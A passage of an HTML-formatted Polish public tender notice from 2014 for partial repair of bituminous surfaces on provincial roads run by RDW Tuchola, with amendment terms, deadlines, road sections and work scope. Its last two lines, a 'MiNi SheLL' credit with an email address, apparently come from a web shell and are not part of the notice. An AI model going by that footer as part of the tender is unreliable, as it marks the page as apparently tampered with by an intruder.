podwykonawcy, wprowadzenie nowego  lub rezygnację z udziału podwykonawcy przy realizacji przedmiotu zamówienia. Zamiana może nastąpić wyłącznie po przedstawieniu przez Wykonawcę oświadczenia podwykonawcy o jego rezygnacji z udziału w realizacji przedmiotu zamówienia oraz o braku roszczeń podwykonawcy wobec Wykonawcy z tytułu realizacji robót. Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach którego Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu, Zamawiający dopuści zmianę pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia przez dotychczasowego podwykonawcę. Zmiany podwykonawcy można dokonać jedynie, jeżeli wykonywanie części robót przez podwykonawcę zostało 
wskazane przez Wykonawcę w ofercie. W wypadku gdy Wykonawca nie wskaże 
w ofercie iż zamierza powierzyć część robót podwykonawcom, ich wprowadzenie 
na etapie wykonywania umowy jest niedopuszczalne.  

2.3.  	Zmiana osób odpowiedzialnych za kontakty i nadzór nad przedmiotem umowy, których nie można było przewidzieć w chwili sporządzenia niniejszej specyfikacji i w chwili 
zawarcia umowy, a których zmiana ma bezpośredni wpływ na wykonanie umowy 
np. gdyby wskutek wydarzeń losowych osoby wskazane w umowie nie mogły pełnić swoich czynności w okresie obowiązywania umowy;
W przypadku osób sprawujących nadzór nad realizacją umowy ze strony Wykonawcy zmiana którejkolwiek z osób musi być uzasadniona przez Wykonawcę na piśmie                 i zaakceptowana pisemnie przez Zamawiającego. Zamawiający zaakceptuje zmianę  wyłącznie wtedy, gdy kwalifikacje i doświadczenie wskazanych osób będą takie same lub wyższe od kwalifikacji i doświadczenia osób wskazanych w ofercie Wykonawcy,           a dokonana zmiana nie spowoduje wydłużenia terminu wykonania przedmiotu umowy.
2.4. 	Zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych             w treści umowy.
2.5.	Zmiany wynagrodzenia w przypadku:
       	a) zmiany obowiązującej stawki podatku od towarów i usług (VAT);
         b) wystąpienia zamówienia uzupełniającego stanowiącego nie więcej niż 50% zamówienia podstawowego za zgodą Zamawiającego i na warunkach określonych w  pkt XX SIWZ.

3.	Zmiany uzasadnione okolicznościami, o których mowa wart. 357 1 k.c. - Jeżeli                 z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby połączone  z nadmiernymi trudnościami albo groziłoby jednej ze stron rażąco stratą, czego strony nie przewidziały przy zawarciu umowy, sąd może po rozważeniu interesów stron, zgodnie z zasadami współżycia społecznego, oznaczać sposób wykonania 
zobowiązania, wysokość świadczenia lub nawet orzec o rozwiązaniu umowy.

4. 	Wszystkie powyższe postanowienia stanowią katalog zmian, na które zamawiający 
może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej 
zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zdw-bydgoszcz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejon Dróg Wojewódzkich w Tucholi przy 
ul. Przemysłowej 4, 89-500 Tuchola.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2014 godzina 08:45, miejsce: Oferty należy składać  w siedzibie Zamawiającego w RDW Tuchola przy 
ul. Przemysłowej 4, 89-500 Tuchola,  sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont cząstkowy nawierzchni bitumicznych na drogach wojewódzkich administrowanych przez RDW Tuchola w  2014r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 w części I objęto drogi wojewódzkie:
              Nr 237  - Czersk - Mąkowarsko  od km   7+006 do km 37+400=30,394 km
                                              od km  41+900 do km 47+405= 5,505 km
 Nr 240  - Chojnice - Świecie       od km  18+000 do km 45+989=27,989 km
Nr 241  - Tuchola - Więcbork     od km   0+000 do km 26+369=26,396 km
                                               od km  28+469 do km 41+831=13,362 km
                                                       Łącznie długość dróg -  103,646 km
2. 	Zamówienie obejmuje następujący zakres robót dla części I :
2.1. 	Zadanie nr 1: Remont cząstkowy nawierzchni bitumicznych grysami 
i emulsją asfaltową:
- remont spękań siatkowych nawierzchni, rakowiny,
- remont cząstkowy nawierzchni, głębokość wyboju do 3 cm,
- remont cząstkowy nawierzchni, głębokość wyboju do 4 cm,
- wykonanie oznakowania poziomego cienkowarstwowego.

2.2. 	Zadanie nr 2: Remont cząstkowy nawierzchni bitumicznych przy użyciu mieszanki mineralno - asfaltowej:
- remont cząstkowy nawierzchni bitumicznej mieszanką mineralno - asfaltową                    z otaczarki,
- frezowanie nawierzchni,
- oczyszczenie i skropienie nawierzchni,
- wyrównanie istniejącej podbudowy mieszanką mineralno - asfaltową: mechaniczne      rozłożenie i zagęszczenie,
- ułożenie nawierzchni z mieszanki mineralno-asfaltowej - grubość warstwy 4 cm - nakładki,
        - regulacja pionowa kratek ściekowych i włazów kanałowych,
- wykonanie oznakowania poziomego cienkowarstwowego.

2.3. 	Zadanie nr 3: Likwidacja przełomów: 
- mechaniczna rozbiórka nawierzchni i podbudowy,
- mechaniczne wykonanie koryta, 
- wykonanie warstwy odsączającej z piasku,
- wykonanie podbudowy z tłucznia kamiennego:
  warstwa dolna 15 cm,
  warstwa górna 15 cm,
- ułożenie warstwy wiążącej z MMA 0/16 mm, 
- ułożenie warstwy ścieralnej z MMA 0/12,6 mm, 
- wykonanie lub pogłębienie rowu przydrożnego, 
- wykonanie oznakowania poziomego cienkowarstwowego.

3. 	Zamawiający dopuszcza rozwiązania równoważne w stosunku do opisywanych w SST. Wykonawca, który zaoferuje rozwiązania równoważne, musi wykazać, że oferowany przez niego przedmiot zamówienia jest równoważny czyli spełnia wymagania określone przez Zamawiającego w SST będącego częścią SIWZ. Zamawiający dokona oceny równoważności w stosunku do wymagań odnoszących się do przedmiotu zamówienia przekazanym Wykonawcom, a zawartym w opisie zamówienia.

4. 	Wykonawca zobowiązany jest oznakować teren robót zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków umieszczania ich na drogach (Dz. U. z 2003r. nr 220 poz.2181 z poźn. zmianami) wg projektu organizacji ruchu na czas prowadzonych robót przekazanego przez Zamawiającego.

5.   Wykonawca zobowiązany jest prowadzić remont cząstkowy i likwidację przełomów 
w taki sposób by ograniczyć utrudnienia w ruchu do niezbędnego minimum 
oraz by nie wyrządzić szkód uczestnikom ruchu drogowego. Wszelkie szkody z tytułu likwidacji szkód wyrządzonych uczestnikom ruchu drogowego poniesie Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont cząstkowy nawierzchni bitumicznych na drogach wojewódzkich administrowanych przez RDW Tuchola w  2014r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. w części II objęto drogi wojewódzkie:
     Nr 189  - Jastrowie - Więcbork       od km 33+255 do km 50+151=16,896 km
     Nr 223  - Bydgoszcz - Białe Błota  od km  2+800 do km  4+900=2,100 km
     Nr 241  - Więcbork - Głogowiniec  od km 41+831 do km 62+732=20,901 km
                                     od km 69+898 do km 69+959=0,061 km
                                    od km 83+703 do km 88+720=5,017 km
                                    od km 89+263 do km 94+039=4,776 km
      Nr 242  - Więcbork - Łobżenica    od km  0+255 do km   8+012=7,757 km
      Nr 243  - Mrocza - Koronowo       od km  8+255 do km 27+184=18,929 km
      Nr 246  - Paterek - Dąbrowa Biskupia  od km  0+000 do km  31+433=31,433 km
                                                  Łącznie długość dróg -    107,870 km

2. Zamówienie obejmuje następujący zakres robót dla części II:
2.1. 	Zadanie nr 1: Remont cząstkowy nawierzchni bitumicznych grysami 
i emulsją asfaltową:
- remont spękań siatkowych nawierzchni, rakowiny,
- remont cząstkowy nawierzchni, głębokość wyboju do 3 cm,
- remont cząstkowy nawierzchni, głębokość wyboju do 4 cm,
- wykonanie oznakowania poziomego cienkowarstwowego.

2.2. 	Zadanie nr 2: Remont cząstkowy nawierzchni bitumicznych przy użyciu mieszanki mineralno - asfaltowej:
- remont cząstkowy nawierzchni bitumicznej mieszanką mineralno - asfaltową                    z otaczarki,
- frezowanie nawierzchni,
- oczyszczenie i skropienie nawierzchni,
- wyrównanie istniejącej podbudowy mieszanką mineralno - asfaltową: mechaniczne      rozłożenie i zagęszczenie,
- ułożenie nawierzchni z mieszanki mineralno-asfaltowej - grubość warstwy 4 cm - nakładki,
        - regulacja pionowa kratek ściekowych i włazów kanałowych,
- wykonanie oznakowania poziomego cienkowarstwowego.

2.3. 	Zadanie nr 3: Likwidacja przełomów: 
- mechaniczna rozbiórka nawierzchni i podbudowy,
- mechaniczne wykonanie koryta, 
- wykonanie warstwy odsączającej z piasku,
- wykonanie podbudowy z tłucznia kamiennego:
  warstwa dolna 15 cm,
  warstwa górna 15 cm,
- ułożenie warstwy wiążącej z MMA 0/16 mm, 
- ułożenie warstwy ścieralnej z MMA 0/12,6 mm, 
- wykonanie lub pogłębienie rowu przydrożnego, 
- wykonanie oznakowania poziomego cienkowarstwowego.

3. 	Zamawiający dopuszcza rozwiązania równoważne w stosunku do opisywanych w SST. Wykonawca, który zaoferuje rozwiązania równoważne, musi wykazać, że oferowany przez niego przedmiot zamówienia jest równoważny czyli spełnia wymagania określone przez Zamawiającego w SST będącego częścią SIWZ. Zamawiający dokona oceny równoważności w stosunku do wymagań odnoszących się do przedmiotu zamówienia przekazanym Wykonawcom, a zawartym w opisie zamówienia.

4. 	Wykonawca zobowiązany jest oznakować teren robót zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków umieszczania ich na drogach (Dz. U. z 2003r. nr 220 poz.2181 z poźn. zmianami) wg projektu organizacji ruchu na czas prowadzonych robót przekazanego przez Zamawiającego.

5.   Wykonawca zobowiązany jest prowadzić remont cząstkowy i likwidację przełomów 
w taki sposób by ograniczyć utrudnienia w ruchu do niezbędnego minimum 
oraz by nie wyrządzić szkód uczestnikom ruchu drogowego. Wszelkie szkody z tytułu likwidacji szkód wyrządzonych uczestnikom ruchu drogowego poniesie Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com